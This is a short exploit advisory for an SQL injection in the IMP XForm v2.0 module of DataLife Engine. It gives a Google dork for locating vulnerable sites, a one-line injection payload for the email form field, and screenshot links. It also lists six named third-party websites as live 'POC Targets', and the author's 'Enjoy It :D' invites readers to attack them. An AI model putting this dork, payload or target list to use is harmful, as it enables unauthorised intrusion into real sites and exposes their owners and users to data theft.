# Exploit Title: IMP XForm v2.0 DatalifeEngine Module SQL Injection
# Exploit Author: Hesam Bazvand
# Software Link: http://www.datalifeengine.ir/download/1396/IMP.XForm.v2.0.zip
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
# Dork : inurl:xform/1.html OR inurl:xform/2.html and etc...
# Email : Black.king066@gmail.com

	Exploit : Insert '"1 In Email Form and Enjoy It :D
	
	Request : https://i.imgur.com/6MjOoYF.jpg
	
	Response : https://i.imgur.com/Pbsr5iq.jpg
	
	POC Targets : 
	http://payamclub.ir/xform/1.html
	http://p-it.ir/xform/1.html
	http://www.dlestore.ir/xform/2.html
	http://www.muslimstudents.ir/xform/2.html
	http://bandarabadan10000.ir/xform/1.html
	http://www.ghaem125.ir/xform/1.html